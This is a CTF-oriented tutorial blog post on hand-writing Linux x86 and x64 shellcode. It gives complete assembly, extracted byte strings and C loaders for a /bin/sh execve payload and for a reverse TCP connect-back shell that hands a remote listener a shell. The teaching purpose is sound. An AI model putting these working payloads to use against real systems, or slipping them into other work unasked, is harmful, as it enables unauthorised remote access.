Linux Shellcode 101: From Hell to Shell
We all love doing CTFs, wargames and other online challenges (well, I do). But most of the time, when we need a shellcode, we get lazy and Google some piece of (sh!t) shellcode that just doesn’t work. After 13 tries with different shellcodes, one eventually works, or you give up and grab the shellcode of someone who already solved the challenge. SHAME !
Just kidding, it happened to me, too. I mean, you solved the challenge, you got control of EIP, you just need a working shellcode, right ? Why work your a$$ off ?
Why Write a Shellcode ?
Well, first, if you just need a simple execve() on /bin/sh, you should know how to write it. Second, sometimes you’ll face more complex situations where you’ll need a custom shellcode, and in those cases you won’t find anything online. Finally, when you do CTFs, speed is key. If you know your craft, you can write anything you want in the blink of an eye !
From C to Assembly
Ultimately, you’ll probably write your shellcode directly in assembly. However, it’s interesting to understand the full process of converting a high-level piece of code to a binary string. Let’s start with a simple C code :
// gcc -o print print.c
#include <stdio.h>
void main() {
printf("YOLO !\n");
}
Now, we can compile it and test it.
root@nms:~# gcc -o print print.c
root@nms:~# ./print
YOLO !
Here, we can use the strace command to see the inner workings of our executable. It intercepts and records the system calls made by a process and the signals it receives.
root@nms:~# strace ./print
execve("./print", ["./print"], 0x7fffb1ec4320 /* 22 vars */) = 0
brk(NULL) = 0x55e96fbcd000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
...[removed]...
brk(NULL) = 0x55e96fbcd000
brk(0x55e96fbee000) = 0x55e96fbee000
write(1, "YOLO !\n", 7YOLO !
) = 7
exit_group(7) = ?
+++ exited with 7 +++
The interesting part is the call to write(), which is a system call: number 4 in the 32-bit syscall table.
Note: You can find a full reference of 32-bit system calls on https://syscalls.kernelgrok.com/.
This call takes 3 arguments. The first one is 1, which asks the syscall to print the string on the standard output (STDOUT). The second is a pointer to our string and the third is the size of the string (7).
ssize_t write(int fd, const void *buf, size_t count);
To make a syscall in 32-bit assembly, we put the syscall number in EAX and the arguments in EBX, ECX and EDX, then trigger interrupt 0x80 with int 0x80. Now, we can start writing the assembly code :
; sudo apt-get install libc6-dev-i386
; nasm -f elf32 print_asm.asm
; ld -m elf_i386 print_asm.o -o print_asm
BITS 32
section .data
msg db "PLOP !", 0xa
section .text
global _start
_start:
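mov eax, 4 ; syscall number for write()
mov ebx, 1 ; fd = 1 (STDOUT)
mov ecx, msg ; pointer to the string
mov edx, 7 ; length of the string
int 0x80 ; trigger the syscall
mov eax, 1 ; syscall number for exit()
mov ebx, 0 ; exit status 0
int 0x80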
Then, you can assemble it and link it :
root@nms:~/asm# nasm -f elf32 print_asm.asm
root@nms:~/asm# ld -m elf_i386 print_asm.o -o print_asm
root@nms:~/asm# ./print_asm
PLOP !
Alright, you now have some knowledge about system calls and the basics of converting C code into assembly.
From Assembly To Shellcode
The next step is to convert our assembly code to a shellcode. But, what is a shellcode anyway ? Well, it’s a string of bytes that can be executed by the CPU as machine code. Here is what it looks like in hexadecimal :
root@nms:~/asm# objdump -Mintel -D print_asm
print_asm: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: b8 04 00 00 00 mov eax,0x4
8049005: bb 01 00 00 00 mov ebx,0x1
804900a: b9 00 a0 04 08 mov ecx,0x804a000
804900f: ba 07 00 00 00 mov edx,0x7
8049014: cd 80 int 0x80
8049016: b8 01 00 00 00 mov eax,0x1
804901b: bb 00 00 00 00 mov ebx,0x0
8049020: cd 80 int 0x80
Disassembly of section .data:
0804a000 <msg>:
804a000: 50 push eax
804a001: 4c dec esp
804a002: 4f dec edi
804a003: 50 push eax
804a004: 20 21 and BYTE PTR [ecx],ah
804a006: 0a .byte 0xa
Note: The <msg> symbol looks like assembly code but it’s our string “PLOP !”. objdump interprets it as code because, as you probably know, there is no real distinction between code and data in machine code.
The <_start> function contains our code. But, if you look closely, there are lots of null bytes. Shellcode is often delivered through string functions such as strcpy(), which treat a null byte as a string terminator. So, if the vulnerable program meets a null byte while copying your shellcode, it stops there, your payload is truncated and the process will probably crash.
However, we often need null bytes in our code, as a parameter for a function or to terminate a string. It’s not that hard to remove null bytes from a shellcode: you just need to be creative and find alternate ways to generate the null bytes you need.
Let me show you how it’s done with our previous example :
; nasm -f elf32 print_asm_2.asm
; ld -m elf_i386 print_asm_2.o -o print_asm_2
BITS 32
section .text
global _start
_start:
xor eax, eax ; EAX = 0
push eax ; string terminator (null byte)
push 0x0a202120 ; line return (\x0a) + " ! " (added space for padding)
push 0x504f4c50 ; "POLP"
mov ecx, esp ; ESP is our string pointer
mov al, 4 ; AL is 1 byte, enough for the value 4
xor ebx, ebx ; EBX = 0
inc ebx ; EBX = 1
xor edx, edx ; EDX = 0
mov dl, 8 ; DL is 1 byte, enough for the value 8 (added space)
int 0x80 ; print
mov al, 1 ; AL = 1
dec ebx ; EBX was 1, we decrement
int 0x80 ; exit
Now, there are no null bytes ! You don’t believe me ? Check that out :
$ nasm -f elf32 print_asm_2.asm
$ ld -m elf_i386 print_asm_2.o -o print_asm_2
$ ./print_asm_2
PLOP !
$ objdump -Mintel -D print_asm_2
print_asm_2: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: 31 c0 xor eax,eax
8049002: 50 push eax
8049003: 68 20 21 20 0a push 0xa202120
8049008: 68 50 4c 4f 50 push 0x504f4c50
804900d: 89 e1 mov ecx,esp
804900f: b0 04 mov al,0x4
8049011: 31 db xor ebx,ebx
8049013: 43 inc ebx
8049014: 31 d2 xor edx,edx
8049016: b2 08 mov dl,0x8
8049018: cd 80 int 0x80
804901a: b0 01 mov al,0x1
804901c: 4b dec ebx
804901d: cd 80 int 0x80
Here, we used multiple tricks to avoid null bytes. Instead of moving 0 to a register, we XOR the register with itself: the result is the same, but without null bytes :
$ rasm2 -a x86 -b 32 "mov eax, 0"
b800000000
$ rasm2 -a x86 -b 32 "xor eax, eax"
31c0
Instead of moving a 1-byte value into a 4-byte register, we use a 1-byte register (the upper bytes of the full register must already be zero, hence the XOR first) :
$ rasm2 -a x86 -b 32 "mov eax, 1"
b801000000
$ rasm2 -a x86 -b 32 "mov al, 1"
b001
And for the string, we just pushed a zero on the stack for the terminator, pushed the string value in 4-byte chunks (reversed, because of little-endian) and used ESP as a string pointer :
xor eax, eax
push eax
push 0x0a202120 ; line return + " ! "
push 0x504f4c50 ; "POLP"
mov ecx, esp
The “shell” code
We had fun printing strings on our terminal but, where is the “shell” part of our shellcode ? Good question ! Let’s create a shellcode which actually gets us a shell prompt.
To do that, we will use another syscall, execve, which is number 11 or 0xb in the syscall table. It takes 3 arguments :
- The program to execute -> EBX
- The arguments or argv (null) -> ECX
- The environment or envp (null) -> EDX
int execve(const char *filename, char *const argv[], char *const envp[]);
This time, we’ll directly write the code without any null bytes.
; nasm -f elf32 execve.asm
; ld -m elf_i386 execve.o -o execve
BITS 32
section .text
global _start
_start:
xor eax, eax
push eax ; string terminator
push 0x68732f6e ; "hs/n"
push 0x69622f2f ; "ib//"
mov ebx, esp ; "//bin/sh",0 pointer is ESP
xor ecx, ecx ; ECX = 0
xor edx, edx ; EDX = 0
mov al, 0xb ; execve()
int 0x80
Now, let’s assemble it and check if it properly works and does not contain any null bytes.
# nasm -f elf32 execve.asm
# ld -m elf_i386 execve.o -o execve
# ./execve
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
# objdump -Mintel -D execve
08049000 <_start>:
8049000: 31 c0 xor eax,eax
8049002: 50 push eax
8049003: 68 6e 2f 73 68 push 0x68732f6e
8049008: 68 2f 2f 62 69 push 0x69622f2f
804900d: 89 e3 mov ebx,esp
804900f: 31 c9 xor ecx,ecx
8049011: 31 d2 xor edx,edx
8049013: b0 0b mov al,0xb
8049015: cd 80 int 0x80
Note: There are multiple ways to write the same shellcode, this is merely an example.
I know what you are thinking: “Hey, this isn’t a shellcode, it’s an executable !”, and you’re right ! This is an ELF file.
$ file execve
execve: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
As we assembled (nasm) and linked (ld) our code, it’s wrapped in an ELF. But in a real use case you don’t inject an ELF file: the executable you target is already mapped in memory, so you just need to inject the code.
You can easily extract the shellcode using objdump and some bash-fu :
$ objdump -d ./execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
Now, you can use this string or shellcode and inject it into a process.
Shellcode Loader
Now, let’s say you want to test your shellcode. First, we need something to load and run it. As you know, a shellcode is meant to be injected into a running program, as it cannot execute itself the way a classic ELF does. You can use the following piece of code to do that :
// gcc -m32 -z execstack exec_shell.c -o exec_shell
#include <stdio.h>
#include <string.h>
unsigned char shell[] = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
int main(void) {
int (*ret)() = (int(*)())shell; // treat the byte array as a function
ret(); // jump into the shellcode
return 0;
}
Or this one, which is slightly different :
// gcc -m32 -z execstack exec_shell.c -o exec_shell
char shellcode[] =
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
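int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2; // aims at main()'s saved return address (depends on the compiler's stack layout)
(*ret) = (int)shellcode; // overwrite it so that returning from main() jumps into the shellcode
}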
Note: You can find some information about these C snippets here.
Connect-Back or Reverse TCP Shellcode
We could do a Bind TCP shellcode but, nowadays, firewalls block most incoming connections, so we prefer a shellcode that connects back to our machine. The main idea of this shellcode is to connect to our machine, on a specific port, and give us a shell. First, we need to create a socket with the socket() system call and connect the socket to the address of the server (our machine) using the connect() system call.
On 32-bit x86, the socket functions go through a single multiplexed syscall called socketcall(), which uses the number 0x66. It takes 2 arguments :
- The call to perform, here SYS_SOCKET or 1 -> EBX
- The args, a pointer to the block containing the actual arguments -> ECX
int socketcall(int call, unsigned long *args);
There are 3 arguments for a call to socket():
- The communication domain, here, AF_INET (2) or IPv4
- The socket type, SOCK_STREAM (1) or TCP
- The protocol to use, which is 0 to let the kernel pick the default protocol for this domain and type (TCP here)
int socket(int domain, int type, int protocol);
Once we have created a socket, we need to connect to the remote machine using the SYS_CONNECT (3) call with the arguments for connect(). Again, we reuse the syscall number 0x66 but with the following arguments :
- The call to perform, here SYS_CONNECT or 3 -> EBX
- The args, a pointer to the block containing the actual arguments -> ECX
There are 3 arguments for a call to connect():
- The file descriptor previously created with socket()
- The pointer to sockaddr structure containing the IP, port and address family (AF_INET)
- The addrlen argument which specifies the size of sockaddr, or 16 bytes.
int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
Just so you know, here is the definition of the sockaddr structure :
struct sockaddr {
sa_family_t sa_family; /* address family, AF_xxx */
char sa_data[14]; /* 14 bytes of protocol address */
};
Now, let’s write that down :
; nasm -f elf32 connectback.asm
; ld -m elf_i386 connectback.o -o connectback
BITS 32
section .text
global _start
_start:
; Call to socket(2, 1, 0)
push 0x66 ; socketcall()
pop eax
xor ebx, ebx
inc ebx ; EBX = 1 for SYS_SOCKET
xor edx, edx ; Building args array for socket() call
push edx ; proto = 0 (IPPROTO_IP)
push BYTE 0x1 ; SOCK_STREAM
push BYTE 0x2 ; AF_INET
mov ecx, esp ; ECX contains the array pointer
int 0x80 ; After the call, EAX contains the file descriptor
xchg esi, eax ; ESI = fd
; Call to connect(fd, [AF_INET, 4444, 127.0.0.1], 16)
push 0x66 ; socketcall()
pop eax
mov edx, 0x02010180 ; Trick to avoid null bytes (128.1.1.2)
sub edx, 0x01010101 ; 128.1.1.2 - 1.1.1.1 = 127.0.0.1
push edx ; store 127.0.0.1
push WORD 0x5c11 ; push port 4444
inc ebx ; EBX = 2
push WORD bx ; AF_INET
mov ecx, esp ; pointer to sockaddr
push BYTE 0x10 ; addrlen = 16, size of sockaddr
push ecx ; pointer to sockaddr
push esi ; socket fd
mov ecx, esp ; ECX contains the array pointer
inc ebx ; EBX = 3 for SYS_CONNECT
int 0x80 ; EAX = 0 on success, the socket fd is still in ESI
Now assemble and link the shellcode, then open a listener in another shell and run the code :
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 51834
Your shellcode will segfault, but that’s normal: there is no code after the connect() call, so the CPU runs into whatever bytes follow. However, you should receive a connection on your listener. Now, we need to implement the shell part of our shellcode. To do that, we will have to play with the file descriptors. There are 3 standard file descriptors :
- stdin or 0 (input)
- stdout or 1 (output)
- stderr or 2 (error)
The idea is to duplicate the socket file descriptor (the one returned by socket() and now connected) onto the three standard file descriptors then, call /bin/sh. That way, everything the shell reads and writes goes through the socket and we get a reverse shell on the target machine.
There is a syscall called dup2, number 0x3f, which can help us with that task. It takes 2 arguments :
- The old fd (our socket) -> EBX
- The new fd (0, 1 or 2) -> ECX
int dup2(int oldfd, int newfd);
Let’s implement the rest of the code :
; Call to dup2(fd, ...) with a loop for the 3 descriptors
mov ebx, esi ; EBX = socket fd saved in ESI after socket()
push BYTE 0x2 ; we start with stderr
pop ecx
dup_loop:
mov BYTE al, 0x3f ; dup2()
int 0x80
dec ecx
jns dup_loop ; loop until the sign flag is set, meaning ECX is negative
; Call to execve()
xor eax, eax
push eax ; string terminator
push 0x68732f6e ; "hs/n"
push 0x69622f2f ; "ib//"
mov ebx, esp ; "//bin/sh",0 pointer is ESP
xor ecx, ecx ; ECX = 0
xor edx, edx ; EDX = 0
mov al, 0xb ; execve()
int 0x80
Note: connect() returns 0 in EAX, not the descriptor, so the socket fd has to come from ESI, where we saved it after socket(). Swapping EAX and EBX here (xchg eax, ebx) would put 0 (stdin) in EBX, and the shell would open in the local terminal instead of on the listener.
Re-assemble the shellcode with the added routine, start a listener and run it :
$ ./connectback
The shell shows up on the listener side. There is no prompt, just type your commands :
id
uid=0(root) gid=0(root) groups=0(root)
You can try to extract the shellcode, it should be null byte free :)
$ objdump -d ./connectback|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\xba\x80\x01\x01\x02\x81\xea\x01\x01\x01\x01\x52\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xf3\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
x64 Shellcode
We assume that you already know 64-bit assembly code. If you don’t, well, it’s almost the same as 32-bit instructions… Anyway, writing 64-bit shellcode is as easy as writing the 32-bit kind.
Note: You can find lots of references for 64-bit system calls on Internet, like this one.
The main differences are :
- Instead of calling int 0x80 to trigger the syscall, we use the syscall instruction
- Registers are 64-bit (O RLY ?!)
- The execve() syscall is 59 (integer)
- Instead of using EAX, EBX, ECX, etc. for the syscall, it’s RAX, RDI, RSI, RDX, etc.
Let’s try to reproduce the execve() shellcode we did earlier.
; nasm -f elf64 execve64.asm
; ld -m elf_x86_64 execve64.o -o execve64
section .text
global _start
_start:
xor rax, rax
push rax ; string terminator
mov rax, 0x68732f6e69622f2f ; "hs/nib//" (Yay! 64-bit registers)
push rax
mov rdi, rsp ; "//bin/sh",0 pointer is RSP
xor rsi, rsi ; RSI = 0
xor rdx, rdx ; RDX = 0
xor rax, rax ; RAX = 0
mov al, 0x3b ; execve()
syscall
Note: Here, we didn’t push the string directly on the stack because pushing a 64-bit immediate value is not possible. So, we used RAX as an intermediate register.
Now, you can try it. Note that the assembler and linker arguments have changed.
$ nasm -f elf64 execve64.asm
$ ld -m elf_x86_64 execve64.o -o execve64
$ ./execve64
# id
uid=0(root) gid=0(root) groups=0
Easy, right ?
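$ objdump -d ./execve64|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x48\x31\xc0\x50\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05"
Note: The mov rax instruction is 10 bytes long and objdump prints at most 7 bytes per line, so the cut range is -f1-7 here. With -f1-6, the \x6e byte is silently dropped and the string no longer spells //bin/sh.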
Your turn now, make them smaller, make them smarter !